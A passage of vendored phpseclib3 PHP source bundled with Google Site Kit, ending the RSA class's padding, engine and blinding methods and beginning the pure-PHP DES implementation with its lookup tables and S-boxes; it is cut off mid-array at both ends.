\Google\Site_Kit_Dependencies\phpseclib3\Exception\InconsistentSetupException('Multiple signature padding modes have been selected; at most only one should be selected'); } $signaturePadding = $selected; $new = clone $this; if ($encryptedCount) { $new->encryptionPadding = $encryptionPadding; } if ($signatureCount) { $new->signaturePadding = $signaturePadding; } return $new; } /** * Returns the padding currently being used * */ public function getPadding() { return $this->signaturePadding | $this->encryptionPadding; } /** * Returns the current engine being used * * OpenSSL is only used in this class (and it's subclasses) for key generation * Even then it depends on the parameters you're using. It's not used for * multi-prime RSA nor is it used if the key length is outside of the range * supported by OpenSSL * * @see self::useInternalEngine() * @see self::useBestEngine() * @return string */ public function getEngine() { if (!isset(self::$engines['PHP'])) { self::useBestEngine(); } return self::$engines['OpenSSL'] && self::$defaultExponent == 65537 ? 'OpenSSL' : 'PHP'; } /** * Enable RSA Blinding * */ public static function enableBlinding() { static::$enableBlinding = \true; } /** * Disable RSA Blinding * */ public static function disableBlinding() { static::$enableBlinding = \false; } } <?php /** * Pure-PHP implementation of DES. * * Uses mcrypt, if available, and an internal implementation, otherwise. * * PHP version 5 * * Useful resources are as follows: * * - {@link http://en.wikipedia.org/wiki/DES_supplementary_material Wikipedia: DES supplementary material} * - {@link http://www.itl.nist.gov/fipspubs/fip46-2.htm FIPS 46-2 - (DES), Data Encryption Standard} * - {@link http://www.cs.eku.edu/faculty/styer/460/Encrypt/JS-DES.html JavaScript DES Example} * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $des = new \phpseclib3\Crypt\DES('ctr'); * * $des->setKey('abcdefgh'); * * $size = 10 * 1024; * $plaintext = ''; * for ($i = 0; $i < $size; $i++) { * $plaintext.= 'a'; * } * * echo $des->decrypt($des->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException; /** * Pure-PHP implementation of DES. * * @author Jim Wigginton <terrafrost@php.net> */ class DES extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher { /** * Contains $keys[self::ENCRYPT] * * @see \phpseclib3\Crypt\DES::setupKey() * @see \phpseclib3\Crypt\DES::processBlock() */ const ENCRYPT = 0; /** * Contains $keys[self::DECRYPT] * * @see \phpseclib3\Crypt\DES::setupKey() * @see \phpseclib3\Crypt\DES::processBlock() */ const DECRYPT = 1; /** * Block Length of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::block_size * @var int */ protected $block_size = 8; /** * Key Length (in bytes) * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKeyLength() * @var int */ protected $key_length = 8; /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'des'; /** * The OpenSSL names of the cipher / modes * * @see \phpseclib3\Crypt\Common\SymmetricKey::openssl_mode_names * @var array */ protected $openssl_mode_names = [self::MODE_ECB => 'des-ecb', self::MODE_CBC => 'des-cbc', self::MODE_CFB => 'des-cfb', self::MODE_OFB => 'des-ofb']; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 500; /** * Switch for DES/3DES encryption * * Used only if $engine == self::ENGINE_INTERNAL * * @see self::setupKey() * @see self::processBlock() * @var int */ protected $des_rounds = 1; /** * max possible size of $key * * @see self::setKey() * @var string */ protected $key_length_max = 8; /** * The Key Schedule * * @see self::setupKey() * @var array */ private $keys; /** * Key Cache "key" * * @see self::setupKey() * @var array */ private $kl; /** * Shuffle table. * * For each byte value index, the entry holds an 8-byte string * with each byte containing all bits in the same state as the * corresponding bit in the index value. * * @see self::processBlock() * @see self::setupKey() * @var array */ protected static $shuffle = ["\x00\x00\x00\x00\x00\x00\x00\x00", "\x00\x00\x00\x00\x00\x00\x00\xff", "\x00\x00\x00\x00\x00\x00\xff\x00", "\x00\x00\x00\x00\x00\x00\xff\xff", "\x00\x00\x00\x00\x00\xff\x00\x00", "\x00\x00\x00\x00\x00\xff\x00\xff", "\x00\x00\x00\x00\x00\xff\xff\x00", "\x00\x00\x00\x00\x00\xff\xff\xff", "\x00\x00\x00\x00\xff\x00\x00\x00", "\x00\x00\x00\x00\xff\x00\x00\xff", "\x00\x00\x00\x00\xff\x00\xff\x00", "\x00\x00\x00\x00\xff\x00\xff\xff", "\x00\x00\x00\x00\xff\xff\x00\x00", "\x00\x00\x00\x00\xff\xff\x00\xff", "\x00\x00\x00\x00\xff\xff\xff\x00", "\x00\x00\x00\x00\xff\xff\xff\xff", "\x00\x00\x00\xff\x00\x00\x00\x00", "\x00\x00\x00\xff\x00\x00\x00\xff", "\x00\x00\x00\xff\x00\x00\xff\x00", "\x00\x00\x00\xff\x00\x00\xff\xff", "\x00\x00\x00\xff\x00\xff\x00\x00", "\x00\x00\x00\xff\x00\xff\x00\xff", "\x00\x00\x00\xff\x00\xff\xff\x00", "\x00\x00\x00\xff\x00\xff\xff\xff", "\x00\x00\x00\xff\xff\x00\x00\x00", "\x00\x00\x00\xff\xff\x00\x00\xff", "\x00\x00\x00\xff\xff\x00\xff\x00", "\x00\x00\x00\xff\xff\x00\xff\xff", "\x00\x00\x00\xff\xff\xff\x00\x00", "\x00\x00\x00\xff\xff\xff\x00\xff", "\x00\x00\x00\xff\xff\xff\xff\x00", "\x00\x00\x00\xff\xff\xff\xff\xff", "\x00\x00\xff\x00\x00\x00\x00\x00", "\x00\x00\xff\x00\x00\x00\x00\xff", "\x00\x00\xff\x00\x00\x00\xff\x00", "\x00\x00\xff\x00\x00\x00\xff\xff", "\x00\x00\xff\x00\x00\xff\x00\x00", "\x00\x00\xff\x00\x00\xff\x00\xff", "\x00\x00\xff\x00\x00\xff\xff\x00", "\x00\x00\xff\x00\x00\xff\xff\xff", "\x00\x00\xff\x00\xff\x00\x00\x00", "\x00\x00\xff\x00\xff\x00\x00\xff", "\x00\x00\xff\x00\xff\x00\xff\x00", "\x00\x00\xff\x00\xff\x00\xff\xff", "\x00\x00\xff\x00\xff\xff\x00\x00", "\x00\x00\xff\x00\xff\xff\x00\xff", "\x00\x00\xff\x00\xff\xff\xff\x00", "\x00\x00\xff\x00\xff\xff\xff\xff", "\x00\x00\xff\xff\x00\x00\x00\x00", "\x00\x00\xff\xff\x00\x00\x00\xff", "\x00\x00\xff\xff\x00\x00\xff\x00", "\x00\x00\xff\xff\x00\x00\xff\xff", "\x00\x00\xff\xff\x00\xff\x00\x00", "\x00\x00\xff\xff\x00\xff\x00\xff", "\x00\x00\xff\xff\x00\xff\xff\x00", "\x00\x00\xff\xff\x00\xff\xff\xff", "\x00\x00\xff\xff\xff\x00\x00\x00", "\x00\x00\xff\xff\xff\x00\x00\xff", "\x00\x00\xff\xff\xff\x00\xff\x00", "\x00\x00\xff\xff\xff\x00\xff\xff", "\x00\x00\xff\xff\xff\xff\x00\x00", "\x00\x00\xff\xff\xff\xff\x00\xff", "\x00\x00\xff\xff\xff\xff\xff\x00", "\x00\x00\xff\xff\xff\xff\xff\xff", "\x00\xff\x00\x00\x00\x00\x00\x00", "\x00\xff\x00\x00\x00\x00\x00\xff", "\x00\xff\x00\x00\x00\x00\xff\x00", "\x00\xff\x00\x00\x00\x00\xff\xff", "\x00\xff\x00\x00\x00\xff\x00\x00", "\x00\xff\x00\x00\x00\xff\x00\xff", "\x00\xff\x00\x00\x00\xff\xff\x00", "\x00\xff\x00\x00\x00\xff\xff\xff", "\x00\xff\x00\x00\xff\x00\x00\x00", "\x00\xff\x00\x00\xff\x00\x00\xff", "\x00\xff\x00\x00\xff\x00\xff\x00", "\x00\xff\x00\x00\xff\x00\xff\xff", "\x00\xff\x00\x00\xff\xff\x00\x00", "\x00\xff\x00\x00\xff\xff\x00\xff", "\x00\xff\x00\x00\xff\xff\xff\x00", "\x00\xff\x00\x00\xff\xff\xff\xff", "\x00\xff\x00\xff\x00\x00\x00\x00", "\x00\xff\x00\xff\x00\x00\x00\xff", "\x00\xff\x00\xff\x00\x00\xff\x00", "\x00\xff\x00\xff\x00\x00\xff\xff", "\x00\xff\x00\xff\x00\xff\x00\x00", "\x00\xff\x00\xff\x00\xff\x00\xff", "\x00\xff\x00\xff\x00\xff\xff\x00", "\x00\xff\x00\xff\x00\xff\xff\xff", "\x00\xff\x00\xff\xff\x00\x00\x00", "\x00\xff\x00\xff\xff\x00\x00\xff", "\x00\xff\x00\xff\xff\x00\xff\x00", "\x00\xff\x00\xff\xff\x00\xff\xff", "\x00\xff\x00\xff\xff\xff\x00\x00", "\x00\xff\x00\xff\xff\xff\x00\xff", "\x00\xff\x00\xff\xff\xff\xff\x00", "\x00\xff\x00\xff\xff\xff\xff\xff", "\x00\xff\xff\x00\x00\x00\x00\x00", "\x00\xff\xff\x00\x00\x00\x00\xff", "\x00\xff\xff\x00\x00\x00\xff\x00", "\x00\xff\xff\x00\x00\x00\xff\xff", "\x00\xff\xff\x00\x00\xff\x00\x00", "\x00\xff\xff\x00\x00\xff\x00\xff", "\x00\xff\xff\x00\x00\xff\xff\x00", "\x00\xff\xff\x00\x00\xff\xff\xff", "\x00\xff\xff\x00\xff\x00\x00\x00", "\x00\xff\xff\x00\xff\x00\x00\xff", "\x00\xff\xff\x00\xff\x00\xff\x00", "\x00\xff\xff\x00\xff\x00\xff\xff", "\x00\xff\xff\x00\xff\xff\x00\x00", "\x00\xff\xff\x00\xff\xff\x00\xff", "\x00\xff\xff\x00\xff\xff\xff\x00", "\x00\xff\xff\x00\xff\xff\xff\xff", "\x00\xff\xff\xff\x00\x00\x00\x00", "\x00\xff\xff\xff\x00\x00\x00\xff", "\x00\xff\xff\xff\x00\x00\xff\x00", "\x00\xff\xff\xff\x00\x00\xff\xff", "\x00\xff\xff\xff\x00\xff\x00\x00", "\x00\xff\xff\xff\x00\xff\x00\xff", "\x00\xff\xff\xff\x00\xff\xff\x00", "\x00\xff\xff\xff\x00\xff\xff\xff", "\x00\xff\xff\xff\xff\x00\x00\x00", "\x00\xff\xff\xff\xff\x00\x00\xff", "\x00\xff\xff\xff\xff\x00\xff\x00", "\x00\xff\xff\xff\xff\x00\xff\xff", "\x00\xff\xff\xff\xff\xff\x00\x00", "\x00\xff\xff\xff\xff\xff\x00\xff", "\x00\xff\xff\xff\xff\xff\xff\x00", "\x00\xff\xff\xff\xff\xff\xff\xff", "\xff\x00\x00\x00\x00\x00\x00\x00", "\xff\x00\x00\x00\x00\x00\x00\xff", "\xff\x00\x00\x00\x00\x00\xff\x00", "\xff\x00\x00\x00\x00\x00\xff\xff", "\xff\x00\x00\x00\x00\xff\x00\x00", "\xff\x00\x00\x00\x00\xff\x00\xff", "\xff\x00\x00\x00\x00\xff\xff\x00", "\xff\x00\x00\x00\x00\xff\xff\xff", "\xff\x00\x00\x00\xff\x00\x00\x00", "\xff\x00\x00\x00\xff\x00\x00\xff", "\xff\x00\x00\x00\xff\x00\xff\x00", "\xff\x00\x00\x00\xff\x00\xff\xff", "\xff\x00\x00\x00\xff\xff\x00\x00", "\xff\x00\x00\x00\xff\xff\x00\xff", "\xff\x00\x00\x00\xff\xff\xff\x00", "\xff\x00\x00\x00\xff\xff\xff\xff", "\xff\x00\x00\xff\x00\x00\x00\x00", "\xff\x00\x00\xff\x00\x00\x00\xff", "\xff\x00\x00\xff\x00\x00\xff\x00", "\xff\x00\x00\xff\x00\x00\xff\xff", "\xff\x00\x00\xff\x00\xff\x00\x00", "\xff\x00\x00\xff\x00\xff\x00\xff", "\xff\x00\x00\xff\x00\xff\xff\x00", "\xff\x00\x00\xff\x00\xff\xff\xff", "\xff\x00\x00\xff\xff\x00\x00\x00", "\xff\x00\x00\xff\xff\x00\x00\xff", "\xff\x00\x00\xff\xff\x00\xff\x00", "\xff\x00\x00\xff\xff\x00\xff\xff", "\xff\x00\x00\xff\xff\xff\x00\x00", "\xff\x00\x00\xff\xff\xff\x00\xff", "\xff\x00\x00\xff\xff\xff\xff\x00", "\xff\x00\x00\xff\xff\xff\xff\xff", "\xff\x00\xff\x00\x00\x00\x00\x00", "\xff\x00\xff\x00\x00\x00\x00\xff", "\xff\x00\xff\x00\x00\x00\xff\x00", "\xff\x00\xff\x00\x00\x00\xff\xff", "\xff\x00\xff\x00\x00\xff\x00\x00", "\xff\x00\xff\x00\x00\xff\x00\xff", "\xff\x00\xff\x00\x00\xff\xff\x00", "\xff\x00\xff\x00\x00\xff\xff\xff", "\xff\x00\xff\x00\xff\x00\x00\x00", "\xff\x00\xff\x00\xff\x00\x00\xff", "\xff\x00\xff\x00\xff\x00\xff\x00", "\xff\x00\xff\x00\xff\x00\xff\xff", "\xff\x00\xff\x00\xff\xff\x00\x00", "\xff\x00\xff\x00\xff\xff\x00\xff", "\xff\x00\xff\x00\xff\xff\xff\x00", "\xff\x00\xff\x00\xff\xff\xff\xff", "\xff\x00\xff\xff\x00\x00\x00\x00", "\xff\x00\xff\xff\x00\x00\x00\xff", "\xff\x00\xff\xff\x00\x00\xff\x00", "\xff\x00\xff\xff\x00\x00\xff\xff", "\xff\x00\xff\xff\x00\xff\x00\x00", "\xff\x00\xff\xff\x00\xff\x00\xff", "\xff\x00\xff\xff\x00\xff\xff\x00", "\xff\x00\xff\xff\x00\xff\xff\xff", "\xff\x00\xff\xff\xff\x00\x00\x00", "\xff\x00\xff\xff\xff\x00\x00\xff", "\xff\x00\xff\xff\xff\x00\xff\x00", "\xff\x00\xff\xff\xff\x00\xff\xff", "\xff\x00\xff\xff\xff\xff\x00\x00", "\xff\x00\xff\xff\xff\xff\x00\xff", "\xff\x00\xff\xff\xff\xff\xff\x00", "\xff\x00\xff\xff\xff\xff\xff\xff", "\xff\xff\x00\x00\x00\x00\x00\x00", "\xff\xff\x00\x00\x00\x00\x00\xff", "\xff\xff\x00\x00\x00\x00\xff\x00", "\xff\xff\x00\x00\x00\x00\xff\xff", "\xff\xff\x00\x00\x00\xff\x00\x00", "\xff\xff\x00\x00\x00\xff\x00\xff", "\xff\xff\x00\x00\x00\xff\xff\x00", "\xff\xff\x00\x00\x00\xff\xff\xff", "\xff\xff\x00\x00\xff\x00\x00\x00", "\xff\xff\x00\x00\xff\x00\x00\xff", "\xff\xff\x00\x00\xff\x00\xff\x00", "\xff\xff\x00\x00\xff\x00\xff\xff", "\xff\xff\x00\x00\xff\xff\x00\x00", "\xff\xff\x00\x00\xff\xff\x00\xff", "\xff\xff\x00\x00\xff\xff\xff\x00", "\xff\xff\x00\x00\xff\xff\xff\xff", "\xff\xff\x00\xff\x00\x00\x00\x00", "\xff\xff\x00\xff\x00\x00\x00\xff", "\xff\xff\x00\xff\x00\x00\xff\x00", "\xff\xff\x00\xff\x00\x00\xff\xff", "\xff\xff\x00\xff\x00\xff\x00\x00", "\xff\xff\x00\xff\x00\xff\x00\xff", "\xff\xff\x00\xff\x00\xff\xff\x00", "\xff\xff\x00\xff\x00\xff\xff\xff", "\xff\xff\x00\xff\xff\x00\x00\x00", "\xff\xff\x00\xff\xff\x00\x00\xff", "\xff\xff\x00\xff\xff\x00\xff\x00", "\xff\xff\x00\xff\xff\x00\xff\xff", "\xff\xff\x00\xff\xff\xff\x00\x00", "\xff\xff\x00\xff\xff\xff\x00\xff", "\xff\xff\x00\xff\xff\xff\xff\x00", "\xff\xff\x00\xff\xff\xff\xff\xff", "\xff\xff\xff\x00\x00\x00\x00\x00", "\xff\xff\xff\x00\x00\x00\x00\xff", "\xff\xff\xff\x00\x00\x00\xff\x00", "\xff\xff\xff\x00\x00\x00\xff\xff", "\xff\xff\xff\x00\x00\xff\x00\x00", "\xff\xff\xff\x00\x00\xff\x00\xff", "\xff\xff\xff\x00\x00\xff\xff\x00", "\xff\xff\xff\x00\x00\xff\xff\xff", "\xff\xff\xff\x00\xff\x00\x00\x00", "\xff\xff\xff\x00\xff\x00\x00\xff", "\xff\xff\xff\x00\xff\x00\xff\x00", "\xff\xff\xff\x00\xff\x00\xff\xff", "\xff\xff\xff\x00\xff\xff\x00\x00", "\xff\xff\xff\x00\xff\xff\x00\xff", "\xff\xff\xff\x00\xff\xff\xff\x00", "\xff\xff\xff\x00\xff\xff\xff\xff", "\xff\xff\xff\xff\x00\x00\x00\x00", "\xff\xff\xff\xff\x00\x00\x00\xff", "\xff\xff\xff\xff\x00\x00\xff\x00", "\xff\xff\xff\xff\x00\x00\xff\xff", "\xff\xff\xff\xff\x00\xff\x00\x00", "\xff\xff\xff\xff\x00\xff\x00\xff", "\xff\xff\xff\xff\x00\xff\xff\x00", "\xff\xff\xff\xff\x00\xff\xff\xff", "\xff\xff\xff\xff\xff\x00\x00\x00", "\xff\xff\xff\xff\xff\x00\x00\xff", "\xff\xff\xff\xff\xff\x00\xff\x00", "\xff\xff\xff\xff\xff\x00\xff\xff", "\xff\xff\xff\xff\xff\xff\x00\x00", "\xff\xff\xff\xff\xff\xff\x00\xff", "\xff\xff\xff\xff\xff\xff\xff\x00", "\xff\xff\xff\xff\xff\xff\xff\xff"]; /** * IP mapping helper table. * * Indexing this table with each source byte performs the initial bit permutation. * * @var array */ protected static $ipmap = [0x0, 0x10, 0x1, 0x11, 0x20, 0x30, 0x21, 0x31, 0x2, 0x12, 0x3, 0x13, 0x22, 0x32, 0x23, 0x33, 0x40, 0x50, 0x41, 0x51, 0x60, 0x70, 0x61, 0x71, 0x42, 0x52, 0x43, 0x53, 0x62, 0x72, 0x63, 0x73, 0x4, 0x14, 0x5, 0x15, 0x24, 0x34, 0x25, 0x35, 0x6, 0x16, 0x7, 0x17, 0x26, 0x36, 0x27, 0x37, 0x44, 0x54, 0x45, 0x55, 0x64, 0x74, 0x65, 0x75, 0x46, 0x56, 0x47, 0x57, 0x66, 0x76, 0x67, 0x77, 0x80, 0x90, 0x81, 0x91, 0xa0, 0xb0, 0xa1, 0xb1, 0x82, 0x92, 0x83, 0x93, 0xa2, 0xb2, 0xa3, 0xb3, 0xc0, 0xd0, 0xc1, 0xd1, 0xe0, 0xf0, 0xe1, 0xf1, 0xc2, 0xd2, 0xc3, 0xd3, 0xe2, 0xf2, 0xe3, 0xf3, 0x84, 0x94, 0x85, 0x95, 0xa4, 0xb4, 0xa5, 0xb5, 0x86, 0x96, 0x87, 0x97, 0xa6, 0xb6, 0xa7, 0xb7, 0xc4, 0xd4, 0xc5, 0xd5, 0xe4, 0xf4, 0xe5, 0xf5, 0xc6, 0xd6, 0xc7, 0xd7, 0xe6, 0xf6, 0xe7, 0xf7, 0x8, 0x18, 0x9, 0x19, 0x28, 0x38, 0x29, 0x39, 0xa, 0x1a, 0xb, 0x1b, 0x2a, 0x3a, 0x2b, 0x3b, 0x48, 0x58, 0x49, 0x59, 0x68, 0x78, 0x69, 0x79, 0x4a, 0x5a, 0x4b, 0x5b, 0x6a, 0x7a, 0x6b, 0x7b, 0xc, 0x1c, 0xd, 0x1d, 0x2c, 0x3c, 0x2d, 0x3d, 0xe, 0x1e, 0xf, 0x1f, 0x2e, 0x3e, 0x2f, 0x3f, 0x4c, 0x5c, 0x4d, 0x5d, 0x6c, 0x7c, 0x6d, 0x7d, 0x4e, 0x5e, 0x4f, 0x5f, 0x6e, 0x7e, 0x6f, 0x7f, 0x88, 0x98, 0x89, 0x99, 0xa8, 0xb8, 0xa9, 0xb9, 0x8a, 0x9a, 0x8b, 0x9b, 0xaa, 0xba, 0xab, 0xbb, 0xc8, 0xd8, 0xc9, 0xd9, 0xe8, 0xf8, 0xe9, 0xf9, 0xca, 0xda, 0xcb, 0xdb, 0xea, 0xfa, 0xeb, 0xfb, 0x8c, 0x9c, 0x8d, 0x9d, 0xac, 0xbc, 0xad, 0xbd, 0x8e, 0x9e, 0x8f, 0x9f, 0xae, 0xbe, 0xaf, 0xbf, 0xcc, 0xdc, 0xcd, 0xdd, 0xec, 0xfc, 0xed, 0xfd, 0xce, 0xde, 0xcf, 0xdf, 0xee, 0xfe, 0xef, 0xff]; /** * Inverse IP mapping helper table. * Indexing this table with a byte value reverses the bit order. * * @var array */ protected static $invipmap = [0x0, 0x80, 0x40, 0xc0, 0x20, 0xa0, 0x60, 0xe0, 0x10, 0x90, 0x50, 0xd0, 0x30, 0xb0, 0x70, 0xf0, 0x8, 0x88, 0x48, 0xc8, 0x28, 0xa8, 0x68, 0xe8, 0x18, 0x98, 0x58, 0xd8, 0x38, 0xb8, 0x78, 0xf8, 0x4, 0x84, 0x44, 0xc4, 0x24, 0xa4, 0x64, 0xe4, 0x14, 0x94, 0x54, 0xd4, 0x34, 0xb4, 0x74, 0xf4, 0xc, 0x8c, 0x4c, 0xcc, 0x2c, 0xac, 0x6c, 0xec, 0x1c, 0x9c, 0x5c, 0xdc, 0x3c, 0xbc, 0x7c, 0xfc, 0x2, 0x82, 0x42, 0xc2, 0x22, 0xa2, 0x62, 0xe2, 0x12, 0x92, 0x52, 0xd2, 0x32, 0xb2, 0x72, 0xf2, 0xa, 0x8a, 0x4a, 0xca, 0x2a, 0xaa, 0x6a, 0xea, 0x1a, 0x9a, 0x5a, 0xda, 0x3a, 0xba, 0x7a, 0xfa, 0x6, 0x86, 0x46, 0xc6, 0x26, 0xa6, 0x66, 0xe6, 0x16, 0x96, 0x56, 0xd6, 0x36, 0xb6, 0x76, 0xf6, 0xe, 0x8e, 0x4e, 0xce, 0x2e, 0xae, 0x6e, 0xee, 0x1e, 0x9e, 0x5e, 0xde, 0x3e, 0xbe, 0x7e, 0xfe, 0x1, 0x81, 0x41, 0xc1, 0x21, 0xa1, 0x61, 0xe1, 0x11, 0x91, 0x51, 0xd1, 0x31, 0xb1, 0x71, 0xf1, 0x9, 0x89, 0x49, 0xc9, 0x29, 0xa9, 0x69, 0xe9, 0x19, 0x99, 0x59, 0xd9, 0x39, 0xb9, 0x79, 0xf9, 0x5, 0x85, 0x45, 0xc5, 0x25, 0xa5, 0x65, 0xe5, 0x15, 0x95, 0x55, 0xd5, 0x35, 0xb5, 0x75, 0xf5, 0xd, 0x8d, 0x4d, 0xcd, 0x2d, 0xad, 0x6d, 0xed, 0x1d, 0x9d, 0x5d, 0xdd, 0x3d, 0xbd, 0x7d, 0xfd, 0x3, 0x83, 0x43, 0xc3, 0x23, 0xa3, 0x63, 0xe3, 0x13, 0x93, 0x53, 0xd3, 0x33, 0xb3, 0x73, 0xf3, 0xb, 0x8b, 0x4b, 0xcb, 0x2b, 0xab, 0x6b, 0xeb, 0x1b, 0x9b, 0x5b, 0xdb, 0x3b, 0xbb, 0x7b, 0xfb, 0x7, 0x87, 0x47, 0xc7, 0x27, 0xa7, 0x67, 0xe7, 0x17, 0x97, 0x57, 0xd7, 0x37, 0xb7, 0x77, 0xf7, 0xf, 0x8f, 0x4f, 0xcf, 0x2f, 0xaf, 0x6f, 0xef, 0x1f, 0x9f, 0x5f, 0xdf, 0x3f, 0xbf, 0x7f, 0xff]; /** * Pre-permuted S-box1 * * Each box ($sbox1-$sbox8) has been vectorized, then each value pre-permuted using the * P table: concatenation can then be replaced by exclusive ORs. * * @var array */ protected static $sbox1 = [0x808200, 0x0, 0x8000, 0x808202, 0x808002, 0x8202, 0x2, 0x8000, 0x200, 0x808200, 0x808202, 0x200, 0x800202, 0x808002, 0x800000, 0x2, 0x202, 0x800200, 0x800200, 0x8200, 0x8200, 0x808000, 0x808000, 0x800202, 0x8002, 0x800002, 0x800002, 0x8002, 0x0, 0x202, 0x8202, 0x800000, 0x8000, 0x808202, 0x2, 0x808000, 0x808200, 0x800000, 0x800000, 0x200, 0x808002, 0x8000, 0x8200, 0x800002, 0x200, 0x2, 0x800202, 0x8202, 0x808202, 0x8002, 0x808000, 0x800202, 0x800002, 0x202, 0x8202, 0x808200, 0x202, 0x800200, 0x800200, 0x0, 0x8002, 0x8200, 0x0, 0x808002]; /** * Pre-permuted S-box2 * * @var array */ protected static $sbox2 = [0x40084010, 0x40004000, 0x4000, 0x84010, 0x80000, 0x10, 0x40080010, 0x40004010, 0x40000010, 0x40084010, 0x40084000, 0x40000000, 0x40004000, 0x80000, 0x10, 0x40080010, 0x84000, 0x80010, 0x40004010, 0x0, 0x40000000, 0x4000, 0x84010, 0x40080000, 0x80010, 0x40000010, 0x0, 0x84000, 0x4010, 0x40084000, 0x40080000, 0x4010, 0x0, 0x84010, 0x40080010, 0x80000, 0x40004010, 0x40080000, 0x40084000, 0x4000, 0x40080000, 0x40004000, 0x10, 0x40084010, 0x84010, 0x10, 0x4000, 0x40000000, 0x4010, 0x40084000, 0x80000, 0x40000010, 0x80010, 0x40004010, 0x40000010, 0x80010, 0x84000, 0x0, 0x40004000, 0x4010, 0x40000000, 0x40080010, 0x40084010, 0x84000]; /** * Pre-permuted S-box3 * * @var array */ protected static $sbox3 = [0x104, 0x4010100, 0x0, 0x4010004, 0x4000100, 0x0, 0x10104, 0x4000100, 0x10004, 0x4000004, 0x4000004, 0x10000, 0x4010104, 0x10004, 0x4010000, 0x104, 0x4000000, 0x4, 0x4010100, 0x100, 0x10100, 0x4010000, 0x4010004, 0x10104, 0x4000104, 0x10100, 0x10000, 0x4000104, 0x4, 0x4010104, 0x100, 0x4000000, 0x4010100, 0x4000000, 0x10004, 0x104, 0x10000, 0x4010100, 0x4000100, 0x0, 0x100, 0x10004, 0x4010104, 0x4000100, 0x4000004, 0x100, 0x0, 0x4010004, 0x4000104, 0x10000, 0x4000000, 0x4010104, 0x4, 0x10104, 0x10100, 0x4000004, 0x4010000, 0x4000104, 0x104, 0x4010000, 0x10104, 0x4, 0x4010004, 0x10100]; /** * Pre-permuted S-box4 * * @var array */ protected static $sbox4 = [0x80401000, 0x80001040, 0x80001040, 0x40, 0x401040, 0x80400040, 0x80400000, 0x80001000, 0x0, 0x401000, 0x401000, 0x80401040, 0x80000040, 0x0, 0x400040, 0x80400000, 0x80000000, 0x1000, 0x400000, 0x80401000, 0x40, 0x400000, 0x80001000, 0x1040, 0x80400040, 0x80000000, 0x1040, 0x400040, 0x1000, 0x401040, 0x80401040, 0x80000040, 0x400040, 0x80400000, 0x401000, 0x80401040, 0x80000040, 0x0, 0x0, 0x401000, 0x1040, 0x400040, 0x80400040, 0x80000000, 0x80401000, 0x80001040, 0x80001040, 0x40, 0x80401040, 0x80000040, 0x80000000, 0x1000, 0x80400000, 0x80001000, 0x401040, 0x80400040, 0x80001000, 0x1040, 0x400000, 0x80401000, 0x40, 0x400000, 0x1000, 0x401040]; /** * Pre-permuted S-box5 * * @var array */ protected static $sbox5 = [0x80, 0x1040080, 0x1040000, 0x21000080, 0x40000, 0x80, 0x20000000, 0x1040000, 0x20040080, 0x40000, 0x1000080, 0x20040080, 0x21000080, 0x21040000, 0x40080, 0x20000000, 0x1000000, 0x20040000, 0x20040000, 0x0, 0x20000080, 0x21040080, 0x21040080, 0x1000080, 0x21040000, 0x20000080, 0x0, 0x21000000, 0x1040080, 0x1000000, 0x21000000, 0x40080, 0x40000, 0x21000080, 0x80, 0x1000000, 0x20000000, 0x1040000, 0x21000080, 0x20040080, 0x1000080, 0x20000000, 0x21040000, 0x1040080, 0x20040080, 0x80, 0x1000000, 0x21040000, 0x21040080, 0x40080, 0x21000000, 0x21040080, 0x1040000, 0x0, 0x20040000, 0x21000000, 0x40080, 0x1000080, 0x20000080, 0x40000, 0x0, 0x20040000, 0x1040080, 0x20000080]; /** * Pre-permuted S-box6 * * @var array */ protected static $sbox6 = [0x10000008, 0x10200000, 0x2000, 0x10202008, 0x10200000, 0x8, 0x10202008, 0x200000, 0x10002000, 0x202008, 0x200000, 0x10000008, 0x200008, 0x10002000, 0x10000000, 0x2008, 0x0, 0x200008, 0x10002008, 0x2000, 0x202000, 0x10002008, 0x8, 0x10200008, 0x10200008, 0x0, 0x202008, 0x10202000, 0x2008, 0x202000, 0x10202000, 0x10000000, 0x10002000, 0x8, 0x10200008, 0x202000, 0x10202008, 0x200000, 0x2008, 0x10000008, 0x200000, 0x10002000, 0x10000000, 0x2008, 0x10000008, 0x10202008, 0x202000, 0x10200000, 0x202008, 0x10202000, 0x0, 0x10200008, 0x8, 0x2000, 0x10200000, 0x202008, 0x2000, 0x200008, 0x10002008, 0x0, 0x10202000, 0x10000000, 0x200008, 0x10002008]; /** * Pre-permuted S-box7 * * @var array */ protected static $sbox7 = [0x100000, 0x2100001, 0x2000401, 0x0, 0x400, 0x2000401, 0x100401, 0x2100400, 0x2100401, 0x100000, 0x0, 0x2000001, 0x1, 0x2000000, 0x2100001, 0x401, 0x2000400, 0x100401, 0x100001, 0x2000400, 0x2000001, 0x2100000, 0x2100400, 0x100001, 0x2100000, 0x400, 0x401, 0x2100401, 0x100400, 0x1, 0x2000000, 0x100400, 0x2000000, 0x100400, 0x100000, 0x2000401, 0x2000401, 0x2100001, 0x2100001, 0x1, 0x100001, 0x2000000, 0x2000400, 0x100000, 0x2100400, 0x401, 0x100401, 0x2100400, 0x401, 0x2000001, 0x2100401, 0x2100000, 0x100400, 0x0, 0x1, 0x2100401, 0x0, 0x100401, 0x2100000, 0x400, 0x2000001, 0x2000400, 0x400, 0x100001]; /** * Pre-permuted S-box8 * * @var array */ protected static $sbox8 = [0x8000820, 0x800, 0x20000, 0x8020820, 0x8000000, 0x8000820, 0x20, 0x8000000, 0x20020, 0x8020000, 0x8020820, 0x20800, 0x8020800, 0x20820, 0x800, 0x20, 0x8020000, 0x8000020, 0x8000800, 0x820, 0x20800, 0x20020, 0x8020020, 0x8020800, 0x820, 0x0, 0x0, 0x8020020, 0x8000020, 0x8000800, 0x20820, 0x20000, 0x20820, 0x20000, 0x8020800, 0x800, 0x20, 0x8020020, 